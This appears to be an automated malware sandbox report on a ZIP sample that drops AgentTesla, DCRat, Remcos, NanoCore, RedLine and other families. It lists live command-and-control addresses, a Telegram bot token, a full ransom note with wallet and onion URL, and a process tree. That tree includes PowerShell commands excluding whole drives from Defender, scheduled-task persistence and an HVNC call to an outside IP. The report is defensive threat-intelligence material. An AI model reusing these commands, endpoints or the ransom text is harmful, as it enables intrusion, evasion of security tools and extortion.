agenttesla | 6fe03f61ee89f37688356f14ee8dc2d0c001e0d43281fad29386270a9c71c92c

Resubmissions

17/09/2023, 21:42

230917-1kqywsfc99 10

09/09/2023, 02:55

06/09/2023, 17:13

13/08/2023, 17:31

27/06/2023, 12:47

13/06/2023, 16:07

Analysis

max time kernel
420s
max time network
425s
platform
windows10-1703_x64
resource
win10-20230831-en
resource tags

arch:x64arch:x86image:win10-20230831-enlocale:en-usos:windows10-1703-x64system
submitted
06/09/2023, 17:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a.zip
Size

832B
MD5

10e578867faad166dc6a8f3868cef2f4
SHA1

f541fab60d482834e90638c5aebdefe3d997174e
SHA256

6fe03f61ee89f37688356f14ee8dc2d0c001e0d43281fad29386270a9c71c92c
SHA512

38389b61e71eed9a9587900f60d59c145d070d0e02602f473c284befcd4898b1191f1982e71463c9cbe17ea36f4ec6c17d665f072e730981eae00fd805863114

Malware Config

Extracted

Family

gh0strat

182.42.105.12

Extracted

Family

amadey

Version

3.88

45.9.74.5/b7djSDcPcZ/index.php

Attributes

install_dir
0ac15cf625
install_file
yiueea.exe
strings_key
ff7b4cd5e3143e87f81788365929e6dd

rc4.plain

Extracted

Family

formbook

Version

4.1

Campaign

xy18

Decoy

ecpgbtrj.cfd

flourishaudiodrama.com

bledcerium.online

fwdnrbnm.cfd

gbohsseo.cfd

bolam3rah85.site

barstool-us.com

angelaluxury.com

promoaverage.site

paragonpediatricurgentcare.com

florescerpsicologia.com

zeajux.cfd

fyxidltp.cfd

theprettynote.com

cygoodshopgogo.top

oconnellro.pro

mmcrecordsph.online

wbtverfrgw.cfd

xiaoseo171.top

horatiothemusical.com

Extracted

Family

remcos

Botnet

Thcinc

b6079658.sytes.net:6110

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
thcinc.exe
copy_folder
Thcinc
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
thcinc
mouse_option
false
mutex
Rmc-X26LV5
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

nanocore

Version

1.2.2.0

discojockeylight.duckdns.org:4444

Mutex

11ab0fe1-4213-49d2-ae5d-4cc94b2030c0

Attributes

activate_away_mode
true
backup_connection_host
discojockeylight.duckdns.org
backup_dns_server
8.8.4.4
buffer_size
65535
build_time
2023-06-17T07:56:57.343492536Z
bypass_user_account_control
true
bypass_user_account_control_data
clear_access_control
true
clear_zone_identifier
false
connect_delay
4000
connection_port
4444
default_group
discojockeylight
enable_debug_mode
true
gc_threshold
1.048576e+07
keep_alive_timeout
30000
keyboard_logging
false
lan_timeout
2500
max_packet_size
1.048576e+07
mutex
11ab0fe1-4213-49d2-ae5d-4cc94b2030c0
mutex_timeout
5000
prevent_system_sleep
false
primary_connection_host
primary_dns_server
8.8.8.8
request_elevation
true
restart_delay
5000
run_delay
0
run_on_startup
true
set_critical_process
true
timeout_interval
5000
use_custom_dns_server
false
version
1.2.2.0
wan_timeout
8000

Extracted

Family

remcos

Version

1.7 Pro

Botnet

Merdeka

ascoitaliasasummer.duckdns.org:3030

Attributes

audio_folder
audio
audio_path
%AppData%
audio_record_time
5
connect_delay
0
connect_interval
5
copy_file
Windows Session Start.exe
copy_folder
Microsoft Media Session
delete_file
false
hide_file
true
hide_keylog_file
true
install_flag
true
install_path
%WinDir%
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
Windows Display
keylog_path
%WinDir%
mouse_option
false
mutex
Windows Audio
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screens
screenshot_path
%AppData%
screenshot_time
1
startup_value
Windows Sound EndPoints
take_screenshot_option
true
take_screenshot_time
5
take_screenshot_title
Username;password;proforma;invoice;notepad

Extracted

Family

agenttesla

https://api.telegram.org/bot5494052141:AAF2aO4sQ_tu4BOnk0pmxB995km7Mslduy0/

Extracted

Path

C:\webRef\How To Restore Your Files.txt

Ransom Note

All your documents, company files, images, etc (and there are a lot of company data) have been encrypted and the extension has been changed to .knight_l . The recovery is only possible with our help. US $14474 in Bitcoin is the price for restoring all of your data. This is the average monthly wage for 1 employee in your company. So don't even think about negotiating. That would only be a waste of time and you will be ignored. Send the Bitcoin to this wallet:1ALCiyMZWD482JKE9m3KeYVqvZRbwiE3W3 (This is your only payment address, please don't pay BTC to other than this or you won't be able to get it decrypted!) After completing the Bitcoin transaction, send an email at: http://knightv5pdwrrfyxghivy3qccxxghk2yfyfigur562gcnmpmgd4pgfid.onion/a6b37125-b8e6-4d51-9476-607342037e0f/ (Download and install TOR Browser (https://www.torproject.org/).[If you don't know how to use it, do a Google search!]).You will get an answer as soon as possible. I expect a message from you with the transfer of BTC Confirmation (TXID). So we can move forward to decrypt all your data. TXID is very important because it will help us identify your payment and connect it to your encrypted data.Do not use that I am here to waste mine or your time. How to buy the BTC? https://www.binance.com/en/how-to-buy/bitcoin https://www.coinbase.com/how-to-buy/bitcoin Note: Your data are uploaded to our servers before being encrypted, Everything related to your business (customer data, POS Data, documents related to your orders and delivery, and others). If you do not contact us and do not confirm the payment within 4 days, we will move forward and will announce the sales of the extracted data. ID:59f51372a1c65de2fcfbd7b0e2fdd55a3b256f6e1865109c5be43beef9779e7f

URLs

http://knightv5pdwrrfyxghivy3qccxxghk2yfyfigur562gcnmpmgd4pgfid.onion/a6b37125-b8e6-4d51-9476-607342037e0f/

https://www.binance.com/en/how-to-buy/bitcoin

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

DcRat 46 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

pid	Process
4968	schtasks.exe
2832	schtasks.exe
1112	schtasks.exe
3616	schtasks.exe
4596	schtasks.exe
3660	schtasks.exe
1444	schtasks.exe
3468	schtasks.exe
3404	schtasks.exe
3352	schtasks.exe
4304	schtasks.exe
4136	schtasks.exe
4296	schtasks.exe
4608	schtasks.exe
4956	schtasks.exe
4656	schtasks.exe
1896	schtasks.exe
3684	schtasks.exe
4120	schtasks.exe
2164	schtasks.exe
1456	schtasks.exe
3796	schtasks.exe
404	schtasks.exe
1412	schtasks.exe
1260	schtasks.exe
4624	schtasks.exe
4928	schtasks.exe
1044	schtasks.exe
4544	schtasks.exe
6244	schtasks.exe
3276	schtasks.exe
688	schtasks.exe
3472	schtasks.exe
2936	schtasks.exe
5024	schtasks.exe
2124	schtasks.exe
4912	schtasks.exe
4292	schtasks.exe
1620	schtasks.exe
2160	schtasks.exe
1776	NOTEPAD.EXE
4552	schtasks.exe
3912	schtasks.exe
3484	schtasks.exe
2976	schtasks.exe
5100	schtasks.exe

Detect Fabookie payload 2 IoCs

resource	yara_rule
behavioral1/memory/2928-57-0x0000000002F40000-0x0000000003071000-memory.dmp	family_fabookie
behavioral1/memory/2928-90-0x0000000002F40000-0x0000000003071000-memory.dmp	family_fabookie

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook

Gh0st RAT payload 1 IoCs

resource	yara_rule
behavioral1/memory/2888-781-0x0000000010000000-0x0000000010017000-memory.dmp	family_gh0strat

Gh0strat
Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.
rat gh0strat
NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader

Process spawned unexpected child process 39 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3616	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4136	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3468	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4956	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2976	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4552	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1456	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2160	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3472	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2164	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3276	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5100	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4596	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4624	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4304	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5024	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1044	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4968	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4912	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3796	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	404	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3352	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4292	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4608	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1412	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1260	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	688	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4120	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3660	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2124	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3684	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1896	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3912	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4656	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2936	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4928	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1620	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1444	4196	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2832	4196	schtasks.exe	90

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral1/memory/5612-461-0x0000000000400000-0x000000000045A000-memory.dmp	family_redline

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x000600000001b05a-2199.dat	asyncrat

DCRat payload 8 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/files/0x000600000001af9b-36.dat	dcrat
behavioral1/files/0x000600000001af9b-45.dat	dcrat
behavioral1/files/0x000600000001afa8-64.dat	dcrat
behavioral1/files/0x000600000001afa8-65.dat	dcrat
behavioral1/memory/5036-66-0x0000000000440000-0x0000000000524000-memory.dmp	dcrat
behavioral1/files/0x000600000001afad-72.dat	dcrat
behavioral1/files/0x000600000001afb2-567.dat	dcrat
behavioral1/files/0x000600000001afb2-566.dat	dcrat

Formbook payload 2 IoCs

rat

resource	yara_rule
behavioral1/memory/2040-1153-0x0000000000400000-0x000000000042F000-memory.dmp	formbook
behavioral1/memory/1772-1368-0x0000000000130000-0x000000000015F000-memory.dmp	formbook

Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3618012334-189558363-1282585034-1000\Control Panel\International\Geo\Nation	Meduza1234.exe

Executes dropped EXE 5 IoCs

pid	Process
3612	a.exe
2928	ss41.exe
4048	Meduza1234.exe
4604	DCRatBuild.exe
5036	agentnet.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
7412	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000700000001afda-727.dat	upx
behavioral1/files/0x000700000001afda-732.dat	upx

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	51.159.66.125

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

VMProtect packed file 6 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/files/0x000900000001afdf-687.dat	vmprotect
behavioral1/files/0x000900000001afdf-691.dat	vmprotect
behavioral1/files/0x000600000001afe2-790.dat	vmprotect
behavioral1/memory/5300-789-0x00000000011F0000-0x0000000001CEA000-memory.dmp	vmprotect
behavioral1/files/0x000600000001afe2-792.dat	vmprotect
behavioral1/memory/5812-825-0x0000000000FF0000-0x0000000001AE2000-memory.dmp	vmprotect

Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3618012334-189558363-1282585034-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Meduza1234.exe
Key opened	\REGISTRY\USER\S-1-5-21-3618012334-189558363-1282585034-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Meduza1234.exe
Key opened	\REGISTRY\USER\S-1-5-21-3618012334-189558363-1282585034-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Meduza1234.exe
Key opened	\REGISTRY\USER\S-1-5-21-3618012334-189558363-1282585034-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Meduza1234.exe
Key opened	\REGISTRY\USER\S-1-5-21-3618012334-189558363-1282585034-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Meduza1234.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
22	api.ipify.org
23	api.ipify.org
92	ipinfo.io
93	ipinfo.io
325	api.2ip.ua
326	api.2ip.ua

Drops file in Program Files directory 6 IoCs

description	ioc	Process
File created	C:\Program Files\Windows Photo Viewer\ja-JP\SearchUI.exe	agentnet.exe
File created	C:\Program Files\Windows Photo Viewer\ja-JP\dab4d89cac03ec	agentnet.exe
File created	C:\Program Files\Windows Defender\a.exe	agentnet.exe
File created	C:\Program Files\Windows Defender\cb48afb91967ec	agentnet.exe
File created	C:\Program Files\Windows Portable Devices\a.exe	agentnet.exe
File created	C:\Program Files\Windows Portable Devices\cb48afb91967ec	agentnet.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
6860	sc.exe
6896	sc.exe
6356	sc.exe
7152	sc.exe
5944	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4452	6724	WerFault.exe	358

Creates scheduled task(s) 1 TTPs 45 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
6244	schtasks.exe
2164	schtasks.exe
3352	schtasks.exe
2832	schtasks.exe
3404	schtasks.exe
1112	schtasks.exe
3796	schtasks.exe
1260	schtasks.exe
4552	schtasks.exe
3276	schtasks.exe
4596	schtasks.exe
4304	schtasks.exe
1044	schtasks.exe
3684	schtasks.exe
1620	schtasks.exe
3616	schtasks.exe
2976	schtasks.exe
4912	schtasks.exe
1412	schtasks.exe
2124	schtasks.exe
3660	schtasks.exe
2936	schtasks.exe
4544	schtasks.exe
4136	schtasks.exe
5100	schtasks.exe
404	schtasks.exe
688	schtasks.exe
4120	schtasks.exe
4296	schtasks.exe
3912	schtasks.exe
3484	schtasks.exe
2160	schtasks.exe
4608	schtasks.exe
4928	schtasks.exe
1456	schtasks.exe
3472	schtasks.exe
4624	schtasks.exe
4292	schtasks.exe
1444	schtasks.exe
4656	schtasks.exe
3468	schtasks.exe
4956	schtasks.exe
5024	schtasks.exe
4968	schtasks.exe
1896	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
6524	timeout.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
1772	NETSTAT.EXE

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3618012334-189558363-1282585034-1000_Classes\Local Settings	DCRatBuild.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1776	NOTEPAD.EXE

Runs net.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
5872	PING.EXE
5656	PING.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
5036	agentnet.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3612	a.exe
Token: SeDebugPrivilege	5036	agentnet.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 2244 wrote to memory of 2744	2244	cmd.exe	77
PID 2244 wrote to memory of 2744	2244	cmd.exe	77
PID 2244 wrote to memory of 2744	2244	cmd.exe	77
PID 2744 wrote to memory of 1368	2744	csc.exe	78
PID 2744 wrote to memory of 1368	2744	csc.exe	78
PID 2744 wrote to memory of 1368	2744	csc.exe	78
PID 3612 wrote to memory of 2928	3612	a.exe	82
PID 3612 wrote to memory of 2928	3612	a.exe	82
PID 3612 wrote to memory of 4048	3612	a.exe	83
PID 3612 wrote to memory of 4048	3612	a.exe	83
PID 3612 wrote to memory of 4604	3612	a.exe	85
PID 3612 wrote to memory of 4604	3612	a.exe	85
PID 3612 wrote to memory of 4604	3612	a.exe	85
PID 4604 wrote to memory of 2076	4604	DCRatBuild.exe	86
PID 4604 wrote to memory of 2076	4604	DCRatBuild.exe	86
PID 4604 wrote to memory of 2076	4604	DCRatBuild.exe	86
PID 2076 wrote to memory of 3216	2076	WScript.exe	87
PID 2076 wrote to memory of 3216	2076	WScript.exe	87
PID 2076 wrote to memory of 3216	2076	WScript.exe	87
PID 3216 wrote to memory of 5036	3216	cmd.exe	89
PID 3216 wrote to memory of 5036	3216	cmd.exe	89

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3618012334-189558363-1282585034-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Meduza1234.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3618012334-189558363-1282585034-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Meduza1234.exe

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\a.zip
1⤵
PID:3128

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4572

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\a.txt
1⤵
- DcRat
- Opens file in notepad (likely ransom note)
PID:1776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\c.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:2244
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe a.txt
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2744
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDF20.tmp" "c:\Users\Admin\Desktop\CSC821C9156E95348A7B4692E7A3D278ED.TMP"
    3⤵
    PID:1368

C:\Users\Admin\Desktop\a.exe
"C:\Users\Admin\Desktop\a.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3612
- C:\Users\Admin\Desktop\a\ss41.exe
  "C:\Users\Admin\Desktop\a\ss41.exe"
  2⤵
  - Executes dropped EXE
  PID:2928
- C:\Users\Admin\Desktop\a\Meduza1234.exe
  "C:\Users\Admin\Desktop\a\Meduza1234.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Accesses Microsoft Outlook profiles
  - outlook_office_path
  - outlook_win_path
  PID:4048
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\Desktop\a\Meduza1234.exe"
    3⤵
    PID:5832
  - - C:\Windows\system32\PING.EXE
      ping 1.1.1.1 -n 1 -w 3000
      4⤵
      Runs ping.exe
      PID:5872
- C:\Users\Admin\Desktop\a\DCRatBuild.exe
  "C:\Users\Admin\Desktop\a\DCRatBuild.exe"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4604
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\webRef\M7YOpcqxG4OzvHNUqrw0u9NFHo55vp.vbe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2076
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\webRef\HY354z.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3216
    - - C:\webRef\agentnet.exe
        
        "C:\webRef\agentnet.exe"
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5036
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        6⤵
        
        PID:3464
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        6⤵
        
        PID:2992
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/webRef/'
        6⤵
        
        PID:4360
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        6⤵
        
        PID:2280
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        6⤵
        
        PID:3628
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        6⤵
        
        PID:1232
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        6⤵
        
        PID:4560
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        6⤵
        
        PID:2412
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        6⤵
        
        PID:5056
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'
        6⤵
        
        PID:3524
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        6⤵
        
        PID:4396
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        6⤵
        
        PID:96
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        6⤵
        
        PID:4412
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LoCHXLIXHs.bat"
        6⤵
        
        PID:4036
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:2724
        
        C:\webRef\ss41.exe
        
        "C:\webRef\ss41.exe"
        7⤵
        
        PID:5440
        
        C:\Windows\svhost.exe
        
        "C:\Windows\svhost.exe"
        8⤵
        
        PID:2440
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svhost" /tr '"C:\Users\Admin\AppData\Roaming\svhost.exe"' & exit
        9⤵
        
        PID:5404
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "svhost" /tr '"C:\Users\Admin\AppData\Roaming\svhost.exe"'
        10⤵
        DcRat
        Creates scheduled task(s)
        
        PID:6244
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpAF28.tmp.bat""
        9⤵
        
        PID:2448
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        10⤵
        Delays execution with timeout.exe
        
        PID:6524
        
        C:\Users\Admin\AppData\Roaming\svhost.exe
        
        "C:\Users\Admin\AppData\Roaming\svhost.exe"
        10⤵
        
        PID:3468
        
        C:\Windows\09CFEkiiM.exe
        
        "C:\Windows\09CFEkiiM.exe"
        8⤵
        
        PID:5948
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        9⤵
        
        PID:5400
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        10⤵
        
        PID:3172
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" AnarchyHVNC 89.23.101.212 1336 dWJhFy
        9⤵
        
        PID:2412
- C:\Users\Admin\Desktop\a\gqnz5n3uw.exe
  "C:\Users\Admin\Desktop\a\gqnz5n3uw.exe"
  2⤵
  PID:5864
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:5612
- C:\Users\Admin\Desktop\a\31839b57a4f11171d6abc8bbc4451ee4.exe
  "C:\Users\Admin\Desktop\a\31839b57a4f11171d6abc8bbc4451ee4.exe"
  2⤵
  PID:5140
- C:\Users\Admin\Desktop\a\dollzx.exe
  "C:\Users\Admin\Desktop\a\dollzx.exe"
  2⤵
  PID:5520
- - C:\Users\Admin\Desktop\a\dollzx.exe
    "C:\Users\Admin\Desktop\a\dollzx.exe"
    3⤵
    PID:5268
